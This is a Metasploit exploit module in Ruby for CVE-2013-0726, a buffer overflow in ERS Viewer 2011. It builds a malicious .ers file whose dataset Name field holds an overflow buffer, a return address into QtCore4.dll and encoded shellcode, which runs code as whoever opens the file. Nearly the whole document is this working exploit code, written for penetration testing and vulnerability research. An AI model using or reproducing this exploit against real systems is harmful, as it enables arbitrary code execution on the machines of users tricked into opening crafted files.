##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info={})
super(update_info(info,
'Name' => "ERS Viewer 2011 ERS File Handling Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
(version 11.04). The vulnerability exists in the module ermapper_u.dll where the
function ERM_convert_to_correct_webpath handles user provided data in a insecure
way. It results in arbitrary code execution under the context of the user viewing
a specially crafted .ers file. This module has been tested successfully with ERS
Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Parvez Anwar', # Vulnerability Discovery
'juan vazquez' # Metasploit
],
'References' =>
[
[ 'CVE', '2013-0726' ],
[ 'OSVDB', '92694' ],
[ 'BID', '59379' ],
[ 'URL', 'http://secunia.com/advisories/51725/' ]
],
'Payload' =>
{
'Space' => 7516,
'BadChars' => "\x22\x5c" +
(0x7f..0xff).to_a.pack("C*") +
(0x00..0x08).to_a.pack("C*") +
(0x0a..0x1f).to_a.pack("C*"),
'DisableNops' => true,
'EncoderOptions' =>
{
'BufferRegister' => 'ESP'
}
},
'SaveRegisters' => [ 'ESP' ],
'DefaultOptions' =>
{
'ExitFunction' => "process",
},
'Platform' => 'win',
'Targets' =>
[
[ 'ERS Viewer 2011 (v11.04) / Windows XP SP3 / Windows 7 SP1',
{
'Offset' => 260,
'Ret' => 0x67097d7a # push esp # ret 0x08 from QtCore4.dll
}
],
],
'Privileged' => false,
'DisclosureDate' => "Apr 23 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.ers']),
], self.class)
end
# Rewrote it because make_nops is ignoring SaveRegisters
# and corrupting ESP.
def make_nops(count)
return "\x43" * count # 0x43 => inc ebx
end
def exploit
buf = rand_text(target['Offset'])
buf << [target.ret].pack("V")
buf << make_nops(8) # In order to keep ESP pointing to the start of the shellcode
buf << payload.encoded
ers = %Q|
DatasetHeader Begin
Name = "#{buf}"
DatasetHeader End
|
file_create(ers)
end
end